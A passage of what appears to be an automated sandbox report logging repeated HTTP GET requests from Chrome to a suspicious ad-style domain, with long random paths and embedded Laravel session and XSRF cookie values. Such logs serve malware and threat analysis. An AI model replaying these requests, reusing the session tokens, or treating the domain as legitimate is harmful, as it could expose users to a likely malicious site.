laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxFxGKaXJ1Sdy5frlO0QjLSY7SGnzx9ErsCrLXZu7niTdftqH1J4qdvt0jG90180 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd200 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /qrYOIGH4BKN8SNOJLeflWipzJBhyIs3HEHEROTD45140 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb12210 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opbVIbbiIjSZq4kw2Hc7sTSmbHWJiruv16eLwu5PtXm7oiXGRy20hh485cd240 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh252 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /klD379FF2GM6zPm33HgL5klVO4I4SQpHwx80Z7Yl1r1coRtBxGS3beU878163 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /uv6rIFznx1ttRnsWBQkXMgsteCK16wIxP3EEivS6Lgi834130 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /wxFxGKaXJ1Sdy5frlO0QjLSY7SGnzx9ErsCrLXZu7niTdftqH1J4qdvt0jG90180 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /rsU9Eqel6oXFg542R0Y7uK4Ff2sJKZkM88HuvPqoKUfUqAEELfv1t5GmNJ6cfSy4J0cd200 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /mnd5uDf70EKBz5cwqXlyQ3qijWRFcxrrFTVjS278142 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opbVIbbiIjSZq4kw2Hc7sTSmbHWJiruv16eLwu5PtXm7oiXGRy20hh485cd240 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb12210 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktLSk1OclZ1d05BNFJobUtvQW1pU3c9PSIsInZhbHVlIjoiYVdoNUFQNTFHRzN3Y01MMVdrbW5BR2Z4OHJ0OExEL1ZxS2VmYmhNVEhONzRPcjZVRXdna2dyVC9uM0dtMFhBRDRjSWpyMEh5RnRpcWNLNkhGMjVsYzNoTDBHelc2Q1doTWZ4U1lZakx0NDkxd3dnb0k1MC83ZmdGSDdlTzVwcEgiLCJtYWMiOiI0YjMyZjU3MzU2NTk1ZDgwMjZkN2FiMWExMDI4MjAxMzYyNDUyNjc0Mzc4OGY3NTkyMWMzOTJjMjdjY2JmMzcyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhCYkVnU3N6Yzc5K3hTMmt2MDFyNGc9PSIsInZhbHVlIjoibjkyM0RzcE9SNEdoUXptdEVqMHd5NGlnYmNhMFpld2ltWkFzWkw0REJObVlxZDczbVdYTlBxbDc4MjIreWJNejhGUVJuZUE3UFNQZ05TRFZncThwYTk0R0ZUaEprSEQ1SHBVS2s2WVFQS2F1cWpYQWh0MDNWREtOUzJXaFg1RWIiLCJtYWMiOiI0N2JlN2ZiNjQ1ZDk5M2IzZDc2MzIwYWQ2ZmJhZTVkYTBmZWMxZTIxOWViZWIzNmQyMTFjZjliYTM1MTA5ZmJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /stJHdx5abCDRUWhdXjmVIv3zo2ry8Mmnl7DqPy6KQiYHAxqLL9JOrSrQVeGnjcq8gh252 HTTP/1.1Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 